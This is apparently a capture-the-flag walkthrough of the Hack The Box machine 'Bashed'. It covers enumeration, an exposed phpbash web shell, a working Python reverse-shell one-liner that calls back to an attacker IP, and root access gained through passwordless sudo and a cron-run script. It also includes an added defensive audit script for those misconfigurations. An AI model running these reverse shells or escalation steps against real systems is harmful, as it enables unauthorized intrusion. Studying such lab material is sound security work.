
Introduction:
Bashed is a fairly easy machine which focuses mainly on fuzzing and locating important files, as basic access to the crontab is restricted.
Skills Required:
- Basic knowledge of Linux
- Enumerating ports and services
Skills Learned:
- Basic web fuzzing techniques
- Locating recently modified files
- Upgrading normal shell to Fully Interactive Shell
Tools Used:
- Nmap
- Gobuster
- Netcat (nc)
1. SCANNING & ENUMERATION
I will start with nmap and the -A parameter to enable OS detection, version detection, script scanning and traceroute, and pipe the output to the tee command, which saves it in a file named “nmap” and also shows it on the screen.

I found only port 80 (HTTP) open, so let’s navigate through it…
After some navigating through the website I found nothing except the page /single.html, which shows what phpbash does and gives its GitHub link. After searching I found that it is a testing platform for pentesting, and the website itself contains an in-browser bash shell. This should be useful.
So far we have nothing… let’s enumerate the directories with Gobuster: dir for directory/file brute forcing mode, -u for the URL, -w for the wordlist to brute force with, -o to save the output, -x php to also look for php files, and 2>/dev/null to discard any errors by sending them to /dev/null.

After enumerating the directories I found a lot of interesting ones, such as /dev, /php and /uploads. Before scanning inside any of these directories I try to just access them via the browser. The uploads directory: nothing. The php directory has a sendMail.php script, this may be something. The dev directory has the phpbash script.
2. EXPLOITATION
http://10.10.10.68/dev/phpbash.php is accessible and opens something close to a terminal, which means we have a shell :D
After navigating to the root directory (/) and listing its directories I found the home directory. Going through it I found 2 directories, arrexel and scriptmanager. Going through arrexel and BOOOOOOOOM!!! I found the user.txt flag.
3. PRIVILEGE ESCALATION
The results of the gobuster scan also showed me that there was an uploads directory, which leads me to believe maybe we can upload files. There are two good options for privesc scripts that I know of: LinEnum and linuxPrivChecker.
LinEnum is a bash script so it’s fine, but linuxPrivChecker is a python script, so we want to check whether the system supports python or not by running “which python”. It gives us its path, so we are ready to go…
First we want to have a shell on the server, so we will listen on our attacking machine with netcat and connect back to it using a python one-liner (used to get a reverse shell):
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.130",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Reference: PayloadAllTheThings
Note: 10.10.16.130 is my IP; you should find yours by typing “ip a” on your machine and taking the IP of the tun0 interface.

Then paste the python one-liner into the phpbash terminal on the website and press Enter.
After connecting, run:
python -c 'import pty;pty.spawn("/bin/bash")'
to get an interactive shell. Reference: Pimp My Shell — 5 Ways to Upgrade a Netcat Shell

Once a connection is established, in my new reverse shell in Kali, I continue with some more enumeration.

Our user can run commands as the scriptmanager user with no password. Dope. So we can run commands as scriptmanager without being asked for a password by prefixing them with:
sudo -u scriptmanager [Your Command]
So we will upgrade our user from arrexel → scriptmanager with:
sudo -u scriptmanager /bin/bash
or
sudo -i -u scriptmanager

Now that we’re the scriptmanager user, let’s take a look and see what we can do with this level of access. To start we’ll check the root directory (/) and list its contents. In here we see that we are able to read, write and execute in a directory called scripts.
What’s interesting here is that scriptmanager owns test.py and root owns test.txt:

Let’s see what’s inside test.py:

It’s a pretty simple script that opens the file test.txt in the current directory, writes “testing 123!” and closes the file.
Knowing that test.txt is owned by root, we can assume the root user is executing this script on some schedule. This makes it an easy task for us, because all we need to do is insert a reverse shell into this script and wait for it to be executed as the root user. To do this we will use the same logic as our first reverse shell.
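Two misconfigurations make this whole chain work: a passwordless sudo rule (arrexel → scriptmanager) and a root-scheduled cron job whose script lives in a directory owned by a non-root user. The script below is an added example written for this writeup, not code from the box or from any of the tools mentioned; it is the audit a sysadmin would run to catch both problems before someone else does. The sudoers and crontab contents of the real box are not shown in the writeup, so the sample data is constructed, uid 1001 is a stand-in for scriptmanager, and file permissions are read through a pluggable stat function so the logic can be exercised offline.

```python
# Added example (not from the original writeup): audit helpers for the two
# misconfigurations chained on this box, passwordless sudo rules and a root
# cron job whose script/directory is owned or writable by a non-root user.
# All sample data below is constructed; paths are checked through a pluggable
# stat function so the checks can be exercised offline.
import os
import re
import shlex
import stat
from typing import Callable, NamedTuple


class FileInfo(NamedTuple):
    uid: int    # owner uid (0 == root)
    mode: int   # permission bits only


def real_stat(path: str) -> FileInfo:
    """stat() a real path and keep only the fields the checks need."""
    st = os.stat(path)
    return FileInfo(st.st_uid, stat.S_IMODE(st.st_mode))


def nopasswd_rules(sudoers_text: str) -> list:
    """Return (user, runas, command) for every NOPASSWD rule in sudoers text."""
    rules = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()           # drop comments
        if "NOPASSWD:" not in line or "=" not in line:
            continue
        user_part, _, spec = line.partition("=")
        user = user_part.split()[0]
        m = re.match(r"\s*\(([^)]*)\)\s*(.*)", spec)    # optional (runas) group
        runas, rest = (m.group(1).strip(), m.group(2)) if m else ("root", spec)
        rules.append((user, runas, rest.split("NOPASSWD:", 1)[1].strip()))
    return rules


def unrestricted_nopasswd(sudoers_text: str) -> list:
    """NOPASSWD rules allowing ALL commands: a full takeover of the runas user."""
    return [r for r in nopasswd_rules(sudoers_text) if r[2] == "ALL"]


def cron_entries(crontab_text: str) -> list:
    """Parse system-crontab lines (5 time fields or @shortcut, user, command)."""
    entries = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                                    # blank, comment or VAR=value
        shortcut = line.startswith("@")
        fields = line.split(None, 2) if shortcut else line.split(None, 6)
        need = 3 if shortcut else 7
        if len(fields) >= need:
            entries.append((fields[need - 2], fields[need - 1]))   # (user, command)
    return entries


def writable_by_non_root(info: FileInfo) -> bool:
    """True if a non-root user owns the path or has write permission on it."""
    return info.uid != 0 or bool(info.mode & (stat.S_IWGRP | stat.S_IWOTH))


def hijackable_cron_targets(crontab_text: str,
                            stat_fn: Callable[[str], FileInfo] = real_stat) -> list:
    """For every root cron job, flag each absolute path in its command (and the
    directory holding it) that a non-root user could modify or replace."""
    findings = []
    for user, command in cron_entries(crontab_text):
        if user != "root":
            continue
        try:
            tokens = shlex.split(command)
        except ValueError:
            tokens = command.split()
        checked = set()
        for tok in (t for t in tokens if t.startswith("/")):
            for path in (tok, os.path.dirname(tok)):
                if path in checked:
                    continue
                checked.add(path)
                try:
                    info = stat_fn(path)
                except OSError:
                    continue                            # path absent on this host
                if writable_by_non_root(info):
                    findings.append((command, path, info.uid, oct(info.mode)))
    return findings


# --- constructed sample data modelled on the box's layout (not real output) ---
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
arrexel ALL=(scriptmanager) NOPASSWD: ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync   # constructed, not from the box
"""

SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root cd /scripts && /usr/bin/python /scripts/test.py
@reboot www-data /usr/local/bin/warmup-cache
"""

FAKE_FS = {   # path -> (uid, mode); uid 1001 stands in for scriptmanager
    "/": FileInfo(0, 0o755), "/etc": FileInfo(0, 0o755),
    "/etc/cron.hourly": FileInfo(0, 0o755), "/usr/bin": FileInfo(0, 0o755),
    "/usr/bin/python": FileInfo(0, 0o755),
    "/scripts": FileInfo(1001, 0o775), "/scripts/test.py": FileInfo(1001, 0o755),
}


def fake_stat(path: str) -> FileInfo:
    if path not in FAKE_FS:
        raise FileNotFoundError(path)
    return FAKE_FS[path]


if __name__ == "__main__":
    for user, runas, _ in unrestricted_nopasswd(SAMPLE_SUDOERS):
        print("sudo: %s may run ANY command as %s without a password" % (user, runas))
    for cmd, path, uid, mode in hijackable_cron_targets(SAMPLE_CRONTAB, fake_stat):
        print("cron: root job %r depends on %s (uid %d, mode %s)" % (cmd, path, uid, mode))
```

On a live host, drop the fake_stat argument and feed it the contents of /etc/crontab and the files under /etc/cron.d; the fix for a finding is to have root own the script and its directory with no group/other write bit, and to replace a NOPASSWD: ALL rule with the specific command that user actually needs.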
But here we have a problem!!!!!
I was having some weird issues with the arrow keys and tab completion; vi was just a hot mess, and I could use neither the arrows to move through the text file nor Ctrl+X to save in nano. Before I go any further I try to clear my reverse shell screen, but the clear command isn’t working. Argh. I think my shell isn’t fully interactive.
After some Googling I found that the answer was in PayloadAllTheThings, but I hadn’t noticed it there: PayloadAllTheThings
I had to press Ctrl+Z and then type:
stty raw -echo; fg
Then press Enter twice. To finalize the upgrade to the interactive shell I set the TERM environment variable to xterm-256color:
export TERM=xterm-256color
- Getting Back to our Privilege Escalation:
Now let’s edit our test.py file with:
nano test.py
This is the same script (though it looks prettier now) that I used in phpbash to open up this reverse shell. We do not need the python -c or the surrounding quotes, since now it is a python file.

After finishing the modification we must make it executable by typing:
chmod +x test.py
Create a listener on a different port from the previous reverse shell and then execute it…

Let’s check our listener…

BOOOOOOOOOOOOOOOOM!!!!! Now we are root :D
You should find the root flag here:
cat /root/root.txt
Thank you so much for reading and I hope you learned a lot as I did ❤
0x3ashry